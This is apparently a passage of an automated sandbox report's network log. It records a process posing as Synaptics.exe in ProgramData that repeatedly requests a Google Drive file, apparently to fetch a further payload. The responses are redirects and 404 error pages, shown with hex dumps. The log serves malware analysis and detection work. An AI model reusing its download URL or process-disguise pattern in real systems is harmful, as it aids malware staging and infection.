                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-FIKWb8EcaDTiZMrhmr0iuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              109192.168.2.449895142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:26 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7L3oSXdigHD8jgqE7gtFTP8l5lVHrovFtl15-7Kvhy8SAD9G9Qgp_i3AO8jEt7lnjn
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:26 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-IbdCGZhoIMLFwGZj9klqGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:26 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:26 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 62 4b 76 47 6a 50 6a 31 4c 55 4a 4e 4f 49 55 64 41 44 64 5f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="NbKvGjPj1LUJNOIUdADd_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:26 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              110192.168.2.449896142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:26 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4i5sEiNyuhF5BrVHo4KtU8SlgbZzzaJs43IqELHSfB4op5cFF3wffMqcnQ_poQGVmY
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:26 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-RX7IWEMyYSlVbnXqrT9arg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:26 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:26 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 44 67 6e 53 45 6f 4e 36 6e 65 50 68 52 4e 68 39 4a 50 73 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="MDgnSEoN6nePhRNh9JPsZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:26 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              111192.168.2.449898142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              112192.168.2.449899142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              113192.168.2.449900142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              114192.168.2.449901142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5AqBy9tun8ULPigPs6eP5Rw7X9xxS8xTEBRJdmvV9LFu4mw9jyVnciP1I90ieAzGhu
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:27 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Zq4UQXsE6qTX5MUard894g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 41 4d 4c 71 58 59 34 39 46 35 58 6c 61 67 74 6f 68 48 6f 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="wAMLqXY49F5XlagtohHobg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              115192.168.2.449904142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:28 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-dxg4uSQLR9mxtnBZRBL6iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              116192.168.2.449905142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:28 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-98kvmQgok8Yh_-Xe-DoJmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              117192.168.2.449908142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:29 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-u2jUfVM2JMAAu1ixbzhTCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              118192.168.2.449907142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
